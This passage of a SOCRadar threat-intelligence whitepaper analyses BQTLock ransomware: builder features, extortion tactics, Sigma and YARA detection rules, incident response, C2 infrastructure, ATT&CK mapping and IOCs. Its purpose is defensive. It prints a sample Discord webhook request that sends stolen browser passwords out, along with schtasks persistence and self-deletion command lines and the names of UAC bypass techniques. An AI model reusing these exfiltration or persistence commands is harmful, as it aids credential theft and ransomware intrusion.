Size limit for files targeted for encryption ●​ Communication Channels: Discord channels, Telegram bots, and C2 infrastructure (IP and port configuration) 57 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper ●​ Advanced Features: - Logging capabilities - Process termination functionality - Task persistence mechanisms - Anti-VM/Anti-Debug protections - Process Hollowing techniques - Backup destruction capabilities - UAC bypass methods - Double extortion with screenshot capture and browser data exfiltration ●​ Visual Customization: ICO file modification and wallpaper replacement BQTLock Ransomware Builder v4.0 #1 58 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper BQTLock Ransomware Builder v4.0 #2 BQTLock Ransomware Builder v4.0 #3 The Linux Builder experience remains more limited; however, within the coming weeks or months, functionality will be expanded to match the Windows Builder capabilities, recognizing the critical need to target Linux systems given the high concentration of servers in enterprise environments. Currently, the Linux Builder allows modification of: ●​ Ransom Note: Custom ransom message ●​ Encrypted Extension: File extension for encrypted files ●​ Maximum File Size: Size threshold for encryption targets ●​ Communication Channels: Discord, Telegram, and C2 configuration (IP and port) 59 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper ●​ Advanced Features: - Process termination (targeting security tools like OSSEC, Splunk, etc.) ​ - systemd persistence mechanisms ​ - Anti-VM/Anti-Debug protections ​ - Backup destruction using `rm -rf` commands ●​ Visual Elements: ICO and wallpaper customization BQTLock Ransomware Builder, Linux Edition Special Features While analyzing various BQTLock versions collectively, it's essential to identify aspects that are uncommon or demonstrate tangential differences from similar RaaS platforms, enabling understanding of its current position and predicting evolution in the coming months. ●​ Cross-Platform Builder Customization: Present across two distinct operating systems (Windows and Linux), enabling modification of icons, wallpapers, ransom notes, encryption extensions, self-deletion, anti-analysis techniques, etc. This 60 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper represents a feature more commonly found in Stealers than in Ransomware variants.​ ●​ API Integration: Enables streamlined automation and more agile communication capabilities.​ ●​ Triple Communication Architecture: Supports connections between the panel, Discord, and Telegram simultaneously, providing comprehensive control over notifications and exfiltration while leveraging legitimate platforms for operational security.​ ●​ Modern Protocol Implementation: Utilizes contemporary communication protocols including HTTP/3 and QUIC for enhanced performance and evasion.​ ●​ Adaptive UAC Bypass: Employs operating system-specific User Account Control bypass techniques tailored to the target environment.​ ●​ Individualized BOT-ID Generation and Tracking: Creates unique identifiers for each compromised device, facilitating external communication across diverse channels.​ ●​ Integrated Stealer Capabilities: Incorporates information theft functionality, extracting browser data and capturing victim screenshots, along with exfiltration of stolen intelligence. Extortion Methods Once the RaaS affiliate or operator has acted, an extortion, psychological, and pressure phase begins, both media and operational, where the adversary can utilize resources provided by the ransomware itself (theft of sensitive information, screenshots, unusable files), as well as the exposure that can occur with all of this, demonstrating the lack of professionalism or defenses that the affected company had, potentially causing severe damage to the company or its suppliers, as well as investors in the affected enterprise. 61 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper ​ Double and Triple Extortion BQTLock is no exception in the possibility of applying double or triple extortion techniques, depending on the victim or how they have built the builder, which allows different options. The adversary can afford, once systems are affected, to blackmail the victim with classic ransomware extortion: "If you want to recover the files, pay" through the ransom file that will be found in the affected paths with all relevant information to maintain contact with them, where they will usually give you a Telegram account, an address, or an email to be able to speak with those who perpetrated the attack. To this extortion, BQTLock tends to add public shaming, where they threaten to publish information they have obtained on their multiple social networks, remembering that BQTLock is highly active and maintains both personal Telegram accounts where they publish all incursions as support and parallel work in hacktivist groups, both on Telegram and Twitter, also having a website (.onion) where they also show their victims. Additionally, BQTLock obtains browser information, as well as screenshots that can reinforce double extortion when dealing with sensitive information where they can extract credentials. However, on occasions they have performed more strategic attacks related to educational or military topics that also allow them to use it as a connecting link to threaten attacks on other objectives due to the first attack (such as DDoS attacks or exploitation of stolen credentials to partner or client infrastructure), causing triple extortion to the victim that leaves little room for maneuverability at a moment of maximum tension. ​ Pressure Warfare & Psychological Tactics In addition to BQTLock's post-encryption activities and operations that may be more or less similar to other RaaS, this group is characterized by having especially aggressive tactics within its modus operandi. In the Waves model explained previously, the actor is aggressive, forcing clients to pay in less than 48 hours under the threat of doubling ransom prices, generating extra pressure on the victim, establishing deadlines both for payment and possible destruction of all files by eliminating the decryption key in 7 days, practices usually known as "panic buying." 62 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Additionally, BQTLock threatens public sale of the obtained data that they extracted moments before encryption, having also created a tool to be able to search for affected credentials (BAQIYAT.osint), adding more psychological tension to the situation. Victim communication panel 63 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Besides this, on affected devices, icons, wallpapers, and ransom notes are changed if necessary, which also plays an important role in affecting and putting pressure on the victim. Additionally, each affiliate can introduce or propose new measures for their victims, multiplying the abusive tactics that BQTLock already proposes as a baseline. At all times, the actor shows their proximity to hacktivist groups, using geopolitical conflicts to justify their attacks, legitimizing themselves as "freedom fighters," trying to escape the ransomware criminal label, causing empathy in some areas and terror in others, playing with the narrative to add this pressure to possible companies or countries that could be contrary to their ideals, creating this psychological attack before having deployed the ransomware, trying to overlap geopolitical events with attacks from BQTLock to maximize media impact and create a call effect to possible affiliates who share their ideology. Threat Intelligence Implications As previously noted, BQTLock has evolved significantly in recent months, gaining visibility and shaping a very distinct and well-defined perspective. Understanding what its next moves might be, as well as how its narratives, techniques, and geopolitical objectives will develop, could be crucial. ​ Insights Into the Future of RaaS based on BQTLOCK BQTLock has shown that affiliates do not need a large infrastructure, since they can rely on legitimate services such as Telegram or Discord to manage operations or obtain information, leveraging redundancy to ensure availability for future ransomware clients. This operational philosophy allows BQTLock to reduce infrastructure expenses and minimize costs. The clear path forward is the continued use of BOT APIs and pre-built panels, where the future focus will be on adding functionalities to the ransomware and improving its performance in Linux environments, as well as enhancing Windows capabilities, rather than building complex infrastructures. This approach makes it easy for any affiliate to adapt to the structure established by BQTLock and its developers, lowering costs and barriers to entry, while accelerating the expansion of this RaaS. 64 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper ​ Trends: Hybrid Groups Whenever possible, actors will maintain a hacktivist façade due to the connection between ZeroDayX and the hacktivist group liwaamohammad, which in turn has ties with other similar groups. This attracts investors or affiliates who share their vision, even if, internally, the façade hides purely financial motivations. The combination of hacktivism and financial gain is an unusual trait, somewhat comparable to certain APT groups that deploy Wipers against geopolitical rivals, not only to harm enemies economically but also to exploit the “freedom fighter” narrative. This hacktivist framing helps justify attacks against certain countries or sectors, disguising a profit-driven scheme as a political cause. The rise of these types of groups, especially amid ongoing geopolitical conflicts, encourages other adversaries to adopt this hybrid model. They leverage political narratives to gain visibility, which in turn translates into greater profitability in the medium and long term. ​ Recommendations Analyzing information and understanding how the adversary operates is just as important as knowing how to protect yourself and counter them, especially considering the constant changes they apply to their techniques and tools. ​ Detection From a detection perspective, it is possible to develop countermeasures based on the Threat Actor’s behavior and the ransomware’s capabilities, in order to mitigate potential impact using already known defensive methods. Below are the essential detection rules. For the complete set, visit the SOCRadar platform. 65 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Sigma [SOCR][TA0005][T1070.004] Command Delay and File Deletion title: Suspicious Timeout Followed by File Deletion via CMD description: Detects use of cmd.exe with timeout /nobreak followed by file deletion, a possible technique for delaying and evading analysis author: SOCRadar date: 2025-09 tags: - attack.defense_evasion - attack.t1070.004 logsource: category: process_creation product: windows detection: selection: Image|endswith: '\cmd.exe' CommandLine|contains|all: - 'timeout' - '/nobreak' - 'NUL & del /f /q' condition: selection 66 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper [SOCR][TA0004][T1548.002] UAC Bypass via Fodhelper/Eventvwr ​ title: UAC Bypass via Fodhelper or Eventvwr Spawning Suspicious Processes description: Detects abuse of fodhelper.exe or eventvwr.exe to escalate privileges by running suspicious secondary processes such as conhost.exe, explorer.exe, or schtasks.exe author: SOCRadar date: 2025-09 tags: - attack.privilege_escalation - attack.t1548.002 logsource: category: process_creation product: windows detection: selection_parent: Image|endswith: - '\fodhelper.exe' - '\eventvwr.exe' selection_child: Image|endswith: - '\conhost.exe' - '\explorer.exe' - '\schtasks.exe' condition: selection_parent and selection_child 67 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper [SOCR][TA0003][T1136.001] Suspicious Local Admin Account Creation title: Suspicious User Account Creation Named BQTLockAdmin or Guest_ description: Detects the creation of suspicious users with the name BQTLockAdmin or with the pattern Guest_(3-6 digits), activity associated with ransomware and malicious persistence author: SOCRadar date: 2025-09 tags: - attack.persistence - attack.t1136.001 logsource: category: security product: windows detection: selection_user_created: EventID: 4720 selection_suspicious_name: TargetUserName|contains: 'BQTLockAdmin' selection_guest_pattern: TargetUserName|re: '^Guest_[0-9]{3,6}$' condition: selection_user_created and (selection_suspicious_name or selection_guest_pattern) 68 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Yara rule BQTLock_RaaS { ​ meta: ​ ​ description = "Detection of BQTLock ransomware samples" ​ ​ category = "Ransomware" ​ ​ author = "SOCRadar" ​ ​ reference = "" ​ ​ date = "2025-09" ​ ​ ​ strings: ​ ​ $a1 = /CreateEventEx(W|A)?/ ascii nocase ​ ​ $a2 = /InternetOpenUrl(A|W)?/ ascii nocase ​ ​ $a3 = /InternetCrackUrl(A|W)?/ ascii nocase ​ ​ $a4 = "NtUnmapViewOfSection" ascii nocase ​ ​ $a5 = "LockFile" ascii nocase ​ ​ $a6 = "MapViewOfFile" ascii nocase ​ ​ $a7 = /CreateFileMapping(A|W)?/ ascii nocase ​ ​ $a8 = "CreateToolhelp32Snapshot" ascii nocase ​ ​ $a9 = "ShellExecute" ascii nocase ​ ​ $a10 = "CryptAcquireContext" ascii nocase 69 https://platform.socradar.com/ ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper ​ ​ $a11 = "CryptGenRandom" ascii nocase ​ ​ $a12 = /SELECT\s/i ​ ​ $a13 = "CMSTP" ascii nocase ​ ​ $a14 = /RSA\s*key/i ​ ​ $a15 = "openssl" ascii nocase ​ ​ $a16 = /AES-(128|192|256)/ ascii nocase ​ ​ $a17 = /EVP_(Encrypt|Decrypt|Cipher)/ ascii nocase ​ ​ $a18 = "mingw" ascii nocase ​ ​ $a19 = "VT_" ascii nocase ​ ​ $a20 = /(gethostname|gethostbyname)/ ascii nocase ​ ​ $a21 = "/sc onlogon" ascii nocase ​ ​ $a22 = /FindFirstVolume(W|A)?/ ascii nocase ​ ​ $a23 = "IsProcessorFeaturePresent" ascii nocase ​ ​ $a24 = "PKEY" ascii nocase ​ ​ $a25 = "%s:" ascii nocase ​ ​ $b1 = { 48 8d 15 ?? ?? 60 00 48 8d 8c 24 80 00 00 00 e8 ?? ?? ?? ?? 8b 15 ?? ?? ?? 00 48 8d 8c 24 80 00 00 00 e8 ?? ?? ?? ?? 41 b8 01 00 00 00 48 8d 15 ?? ?? 60 00 48 89 c1 48 89 c7 e8 ?? ?? ?? ?? 8b 15 ?? ?? ?? 00 48 89 f9 e8 ?? ?? ?? ?? 41 b8 07 00 00 00 48 8d 15 ?? ?? 60 00 48 89 c1 48 89 c7 e8 ?? ?? ?? ?? 8b 15 ?? ?? ?? 00 48 89 f9 e8 ?? ?? ?? ?? 66 83 3d ?? ?? ?? 00 00 74 2e 41 b8 03 00 00 00 48 8d 15 ?? ?? 60 00 } ​ ​ $b2 = { e8 ?? ?? 5c 00 41 b8 11 00 00 00 48 8d 15 ?? ?? 60 00 48 8d 4c 24 38 e8 ?? ?? 58 00 } ​ ​ $b3 = { 48 83 ec 38 48 8d 05 ?? ?? f2 ff 48 89 44 24 20 e8 ?? ?? f1 ff 48 83 c4 38 c3 } ​ ​ $b4 = { 48 8d ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? (45 31 c0 | 41 b8 00 00 00 00) 48 89 d9 48 8d 15 ?? ?? 60 00 e8 ?? ?? 50 00 48 ?? ?? ?? ?? ?? ?? e8 ?? ?? 5a 00 (48 83 7c 24 78 ff | 48 83 f8 ff 0f 94 c3) } ​ ​ $b5 = {(44 8b 84 24 ?? ?? ?? ?? | 8b 45 ??)(31 d2 | ba 00 00 00 00) b9 01 00 00 00 (ff 15 ?? ?? ?? 00 | ff d0) (48 89 c6 | 48 89 85 ?? ?? 00 00) (48 85 c0 | 48 83 bd ?? ?? 00 00 00) 0f 84 ?? ?? 00 00 (31 d2 | ba 01 00 00 00) (48 89 c1 | 48 89 c1) (ff 15 ?? ?? ?? 00 | ff d0) 85 c0 (0f 84 ?? ?? 00 00 | 0f 95 c0 84 c0 70 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper 0f 84 ?? ?? 00 00) } ​ ​ $b6 = { e8 ?? ?? ?? 00 (ff 15 ?? ?? ?? 00 | 48 8b 05 ?? ?? ?? 00 ff d0) (48 89 c1 | 48 89 85 ?? ?? 00 00) (48 89 44 24 ?? | 48 8b 85 ?? ?? 00 00) (ff 15 ?? ?? ?? 00 | 48 8b 05 ?? ?? ?? 00 ff d0) (49 89 c6 | 48 89 85 ?? ?? 00 00) (41 ff d5 | 89 85 ?? ?? 00 00) (41 89 c0 | b9 01 00 00 00) (44 89 e2 | 8b 8d ?? ?? 00 00) (4c 89 f1 | 8b 95 ?? ?? 00 00) (ff 15 ?? ?? ?? 00 | 48 8b 05 ?? ?? ?? 00 ff d0) } ​ ​ $b7 = { e8 ?? ?? ?? 00 48 8d 85 ?? ?? 00 00 8b 95 ?? ?? 00 00 48 89 c1 e8 ?? ?? ?? 00 48 8d 85 ?? ?? 00 00 48 8d 8d ?? ?? 00 00 48 8d 15 ?? ?? 0f 00 49 89 c8 48 89 c1 e8 ?? ?? ?? 00 48 8d 85 ?? ?? 00 00 48 8d 0d ?? ?? 0f 00 48 8d 95 ?? ?? 00 00 49 89 c8 48 89 c1 } ​ ​ $b8 = { (48 89 c1 | e8 ?? ?? ?? 00) e8 ?? ?? ?? 00 48 8d 85 ?? ?? 00 00 48 89 c1 e8 ?? ?? ?? 00 48 8d 45 40 48 89 c1 e8 ?? ?? ?? 00 48 8b 85 ?? ?? 00 00 48 89 c1 e8 ?? ?? ?? 00 48 8d 85 ?? ?? 00 00 (48 89 85 ?? ?? 00 00 | 90 90) 48 8d 8d ?? ?? 00 00 48 8d 15 ?? ?? 0f 00 48 8d 85 ?? ?? 00 00 49 89 c8 48 89 c1 e8 ?? ?? ?? 00 48 8d 85 ?? ?? 00 00 48 8b 95 ?? ?? 00 00 48 89 c1 e8 ?? ?? ?? 00 } ​ ​ ​ condition: ​ ​ filesize > 800KB ​ ​ and filesize < 10MB ​ ​ and (8 of ($a*)) ​ ​ and (1 of ($b*)) ​ ​ and any of ($a14,$a15,$a16,$a17) ​ ​ and uint16(0) == 0x5a4d ​ ​ and uint32(uint32(0x3C)) == 0x00004550 } 71 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Response & Mitigation Developing strategies or playbooks to contain or react to an attack like BQTLock is also a key component of the defensive strategy. Designing specific measures to strengthen protection in this area can make a significant difference. Response - Isolate affected systems - Disconnect machines from the network (both cable and WiFi) to isolate infected devices - Disable suspicious accounts (BQTLockAdmin, Guest_xxxx) - Stop lateral movement - Block remote access protocols such as SMB or RDP - Revoke compromised credentials (both domain and local) - Terminate injected processes or BQTLock binary processes - Cut C2 communications - Block IP ranges for Telegram and Discord that BQTLock may use as C2 via firewall and proxy - Review DNS logs and outbound connections to detect persistent activity 72 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper - Preserve evidence - Collect memory dumps, disk images, and export EDR, Sysmon, and AD logs - Do not shut down critical servers until forensic snapshots have been obtained Eradication and Remediation - Remove persistence - Search for and delete scheduled tasks in schtasks /query related to BQTlock - Review hijacked registry keys (\shell\open\command, ms-settings, or mscfile) - Remove malicious accounts - Enforce password resets across all administrative account - Audit account creation logs (EventID 4720) - Eliminate binaries, malicious files, and deploy detection rules - Locate files such as bqt_payload.exe, bqt_log.txt, bqt_screenshot_*.png - Use YARA and Sigma rules, and develop additional rules based on observed changes in BQTLock variants 73 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper - System restoration - Restore from clean, offline backups - If no reliable backup exists, evaluate forensic recovery tools for shadow copies (if not deleted by vssadmin) Preventive Mitigation - Endpoint hardening - Restrict use of WMIC, bcdedit, vssadmin, and schtasks to authorized administrators - Implement AppLocker or WDAC to block execution from %AppData% and %Temp% - Account and privilege hardening - Disable the local Administrator account - Enforce MFA on all RDP and VPN access 74 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper - Robust backups - Ensure immutable backups and perform regular restoration tests - Segment the backup network - Monitoring and detection - Deploy Sigma rules and develop custom EDR rules - Monitor for suspicious account creation and administrative tool execution - Network filtering - Block Telegram, Discord, or BQTLock panel IPs/CIDRs linked to C2 via firewall and proxy - Monitor explorer.exe connections to the internet 75 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Further Intelligence Feed The attacker has leveraged multiple infrastructures during their campaigns, leaving traces in the RaaS samples. Understanding what was used and how it was deployed is a valuable advantage for establishing mitigation strategies and mapping out the adversary’s infrastructure. ​ Panel Whether operated by affiliates or operators, the builder configures the C&C server for communication and bootstart tasks. Two recurring IPs have been observed: [92.113.146[.]56] and [208.99.44[.]55]. The first IP has been reported and is directly linked to BQTlock, Source: SOCRadar Platform 76 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper General characteristics show a login panel via nginx explicitly referencing BQTlock, suggesting it is used to pivot to other machines containing the same string—although no additional instances were found. General information about the C2 domain 77 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper C2- Port 80 (nginx 1.24.0, Ubuntu), showing HTTP headers and session cookie details Header details for the C2 IP Based on the characteristics of this initial address, more than 200 similar IPs were identified, some of which also exposed ports 22 and 80 like the original panel, though none were reported or displayed identical traits. Similar IPs 78 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Additional neighboring IPs were identified through Validin. Neighbor IP address Neighbor domain 79 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper The relationship between this IP and ransomware hashes that have been linked from the SOCRadar platform to BQTLock directly is clearly visible: Source: SOCRadar Platform 80 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper This initial IP represents, as one might guess, the login panel of the BQTLock C2 where affiliates and operators could log in to locate victims with the information sent during the bootstart stage: Login panel For the second IP, different characteristics were noted, with only one other related address found. Nevertheless, it serves the same function as the first, acting as a portal for affiliates and operators: 81 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper On this occasion, this IP also appears to be linked to other clear indicators of BQTlock: Source: SOCRadar Platform 82 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Source: SOCRadar Platform 83 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Source: SOCRadar Platform 84 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Interacting with these panels results in receiving an identifier, later used for authenticating with the victim’s ID: ​ Telegram & Discord Telegram is leveraged during ransomware execution to transmit collected data via BOTs. In these executions, the adversary gathered sensitive information (OS, Hostname, HWID, etc.), linking it to the administrator account and password created on the infected device to send requests. The attacker uses multiple BOTs, so retrieving or accessing information may not always be possible, even if fields are extracted and requests simulated: #1 85 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper #2 The typical flow is a request containing victim system data, reflected in the BOT, which affiliates or operators can review directly from their mobile devices without logging into the panel: 86 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Telegram bot output for victim system data Additionally, tools like Matkap can correlate tokens across domains, helping extract potential IOCs from BOTs reversed during analysis: Matkap output 87 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper On Discord, the adversary uses webhooks to send files containing sensitive victim data, creating a third communication channel (Sample → Affiliate/Operator). These webhooks are frequently rotated or banned, complicating infrastructure tracking. The basic functionality involves sending a JSON-formatted file, typically bqt_passwords.txt, containing browser credentials. This allows the adversary to receive sensitive data immediately. 88 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper POST /api/webhooks// HTTP/xx Host: discord.com User-Agent: Mozilla/xx Accept: application/json Content-Type: multipart/form-data; boundary=---------------------------2327476541 Content-Length: -----------------------------2327476541 Content-Disposition: form-data; name="payload_json" Content-Type: application/json { "content": "File attached: bqt_passwords.txt" } -----------------------------2327476541 Content-Disposition: form-data; name="passwords_file"; filename="bqt_passwords.txt" Content-Type: text/plain --- Collected Browser Passwords --- -----------------------------2327476541-- On Discord, the webhook is configured to receive requests and files containing data harvested from browsers: 89 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper #1 #2 90 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper #3 Conclusion In summary, BQTLock is a RaaS that has demonstrated versatility, with traits that set it apart from other adversaries of the same kind. It is rooted in strong political propaganda, which is uncommon within its niche. Its objectives will continue to be framed as ideological claims, even though the underlying motives remain criminal. At every stage, they will seek to develop and evolve the ransomware while maximizing exposure to attract more affiliates, carrying out gradual attacks that will push them higher in the global ransomware rankings. Although they are currently undergoing a period of change—where we will see modifications in infrastructure, malware, and their website—the ideals and the direction they established from the very beginning will remain constant. 91 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper MITRE ATT&CK TTPs Tactic Technique Description - Example TA0002 Execution T1047: Windows Management Instrumentation Remote execution of the binary, as well as deletion of ShadowCopies by abusing WMI (process call create) T1055.012: Process Hollowing Process hollowing TA0003 Persistence T1053: Scheduled Task/Job schtasks /create /tn "" /tr "C:\Users\\Desktop\.exe" /sc ONLOGON /rl HIGHEST /f T1136.001: Create Account: Local Account Create new admin user TA0004 Privilege Escalation T1548.002: Bypass User Account Control UAC abuse to execute legitimate binaries (CMSTP, fodhelper & eventvwr) TA0005 Defense Evasion T1112: Modify Registry Modification of registry T1562.001: Impair Defenses: Disable Tools Kill security processes (e.g., Sysmon) T1070.004: File Deletion Auto-delete file (e.g.,cmd.exe / C timeout /t 3 /nobreak > NUL & del /f /q \"".) T1548.002: Abuse Elevation Control Mechanism: Bypass User UAC bypass via CMSTP (.inf with /s), later using fodhelper or eventvwr.exe 92 https://attack.mitre.org/techniques/T1047/ https://attack.mitre.org/techniques/T1055/012/ https://attack.mitre.org/techniques/T1053/ https://attack.mitre.org/techniques/T1136/001/ https://attack.mitre.org/techniques/T1548/002/ https://attack.mitre.org/techniques/T1112/ https://attack.mitre.org/techniques/T1562/001/ https://attack.mitre.org/techniques/T1070/004/ https://attack.mitre.org/techniques/T1548/002/ ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Account Control TA0006 Credential Access T1078: Valid Accounts Check admin privileges T1555.003: Credentials from Web Browsers Collect saved passwords from browsers T1074: Data Staged Saved passwords written to C:\Windows\Temp\_passwords.txt TA0007 Discovery T1082: System Information Discovery System information discovery TA0009 Collection T1622: Debugger Evasion Anti-debug checks T1113: Screen Capture Take screenshots TA0011 Command and Control T1071.001: Application Layer Protocol: Web Get public IP via WinInet T1041: Exfiltration Over C2 Channel Extract info collected to C2 TA0040 Impact T1486: Data Encrypted for Impact File encryption T1490: Inhibit System Recovery Delete backups (VSS, Shadow Copies, Volume Snapshots) 93 https://attack.mitre.org/techniques/T1078/ https://attack.mitre.org/techniques/T1555/003/ https://attack.mitre.org/techniques/T1074/ https://attack.mitre.org/techniques/T1082/ https://attack.mitre.org/techniques/T1622/ https://attack.mitre.org/techniques/T1113/ https://attack.mitre.org/techniques/T1071/001/ https://attack.mitre.org/techniques/T1041/ https://attack.mitre.org/techniques/T1486/ https://attack.mitre.org/techniques/T1490/ ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper IOCs ●​ 425b2f283b71237276f84d941d9c2982c7f61a9aff12ece10e15065b73b7165e ●​ b211537ea626fae4ad2ef5ee2652633dc68aaf20da6eb953a44f266c4106b367 ●​ 11affbeb18f4d6edcc9a4be5a82f8e23dfc31178887e97119faa5ddc75990494 ●​ 00005ed250d85fc47e4c3883b8e6179a9888b8140acfeb94a40edc36bd523adb ●​ a6a397fec6c109a1402c6f1144d647843b2093f65fedd27204b40ebeea0640b6 ●​ 618070d597dd73c43ba5d4bde2baa93a4f6038e3279de3bafe688caa5c409a58 ●​ cd5e7b3b59cea14b804f6c01821d1ab94a0046422fe956f623b238c5db0cac99 ●​ 4369aed581de0fe84c25a1ef2c3cf0bb6bf70df8b51fdf38b3b0b2a55f43261b ●​ 862f29aa00bb4ee33729bc6699990dbdf9ef890b8364f8288b173cb1ca5d6787 ●​ 49f89b2fdef345a9d92fc821e4a226d8ac99e4ca0d2d11b5654f6557800b85f2 ●​ 881b048234ebed82339244eb0c18580d785944dc82f83949f6adc1a9bc225c3b ●​ f77c203d0c80598954c06a0f6f0c46f8b885ba423d12a21f13ded0168aa11b10 ●​ dacbba7f18d0835deb2eeb4e4d82c8f57234767291a90da1a5f3fd02d6bc13c2 ●​ fbd67a3bcc964e370931f620a85bf368d7b5797ebc1d53fe3be11a89a90e7961 ●​ 10938c2d01dc999d2fe1f8c635e3705e7e663077935a17e730c849d1191c76ed ●​ e2622ede1ebe5a37c439a32f0c63c13f893d1e5513b27367502898651cc5464b ●​ 590e47944ef0597bf1ff1d41656859b776e7031a4611cbf22d619002cbe49312 ●​ 97524f4c582e0fbe46b74a7cfe4db9f078f368520cda25f27a50c5d2c50161f9 ●​ 56eec59a5fe3f5a3c2c836701557bf1956770f465cd9e049995b86aef76a3e39 ●​ b61ae633616d7dd29aaf0b170fdfbe8f282c0f8bdcb1c52aedee473ce4bf5789 ●​ 780e34c72404fd464669626ae554b81393d2bae95293284b375bb5d989914486 ●​ 5b992a3438e344dddcdd66151a40efb3452b2ff37cdc40b37db612afeb29ed29 ●​ 008ec0226066572f4b27f100d08443120b9dd55cefbec2bbff994b5b552e546c ●​ 0ccd3f2d7e6637eaf5414e35b97d9d8bf6b8e4182859cace8ca8e02377a4e62a ●​ 9547933dd46501af7fc095a3513e48b81178e344b86e075b679259875f0fd5a7 ●​ af90666822646e35eb52248f4a89eb715ce9f44459205bc24827a2aafe053548 ●​ 324eabc27a25f524c94bb62573986b3335ab5181ddc6825d959d16aaaccdc7aa ●​ b7796a3b1812f329c43d5d37bbb6d8032b7bc06b15af29f555eb3e0c7b1b1c3d ●​ 9cd62dbace3324487124787127cff7c63a9f005d8d3aff9bac28c437e5caefc7 ❖​ 92.113.146[.]56 ❖​ 208.99.44[.]55 ➔​ bcoins[.]online 94 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper yywhylvqeqynzik6ibocb53o2nat7lmzn5ynjpar3stndzcgmy6dkgid.onion Ransom Onion Site https://t.me/BQTlock_raas https://t.me/Fuch0u https://t.me/liwaamohammad https://t.me/BQTlock https://x.com/zerodayx1 https://t.me/ZeroDayX1 https://x.com/anonlb_ https://t.me/anonlb https://t.me/BQTosint TA Social Networks https://guns.lol/zerodayx TA Webpage BQTlock@tutanmail.com Mail 89RQN2EUmiX6vL7nTv3viqUAgbDpN4ab329zPCEgbceQJuS233uye4 eXtYk3MXAtVoKNMmzgVrxXphLZbJPtearY7QVuApr Wallet 95 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper External Resources https://x.com/JAMESWT_WT/status/1958071306454184200 https://x.com/Fact_Finder03/status/1958046987472769319 https://x.com/ido_cohen2/status/1950860288556761191 https://x.com/askardyuss/status/1950252992936235246 https://x.com/1ZRR4H/status/1958181978479419430 https://x.com/zerodayx1/status/1954946452842750048 https://x.com/askardyuss/status/1949201446936752172 https://x.com/abdul__alamri/status/1949468133309178050 https://x.com/search?q=LulzSec%20AND%20bQTLock&src=typed_query&f=live https://cybershafarat.com/2025/04/09/doxx-zerodayx/ https://www.pcrisk.com/removal-guides/33382-bqtlock-ransomware https://www.dexpose.io/bqtlock-ransomware-hits-european-business-server-cluster-in-ireland/ https://www.cyfirma.com/news/weekly-intelligence-report-25-july-2025/ https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/bqtlock https://cybershafarat.com/2025/07/16/bqtlock-ransomware-v1/ https://cybershafarat.com/2025/07/30/bqtlock-ransomware-op-status/ https://cybershafarat.com/2025/07/19/bqtlock-raas-now-available/ https://labs.k7computing.com/index.php/examining-the-tactics-of-bqtlock-ransomware-its-variants/ https://www.resecurity.com/blog/article/iran-linked-threat-actors-leak-visitors-and-athletes-data-from-saudi- games https://id-ransomware.blogspot.com/2025/07/baqiyatlock-ransomware.html https://cn-sec.com/archives/4356728.html https://www.163.com/dy/article/K6N2G2KI0538B1YX.html https://otx.alienvault.com/pulse/68a90698ae03099dfa5b86cf 96 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Who is SOCRadar? SOCRadar provides Extended Threat Intelligence (XTI) that combines: "Cyber Threat Intelligence, Brand Protection, External Attack Surface Management, and Dark Web Radar Services." SOCRadar provides the actionable and timely intelligence context you need to manage the risks in the transformation era. Trusted by​ 21.000+ companies​ in 150+ countries Dark Web Monitoring: SOCRadar's fusion of its unique Dark Web recon technology with the human analyst eye further provides in-depth 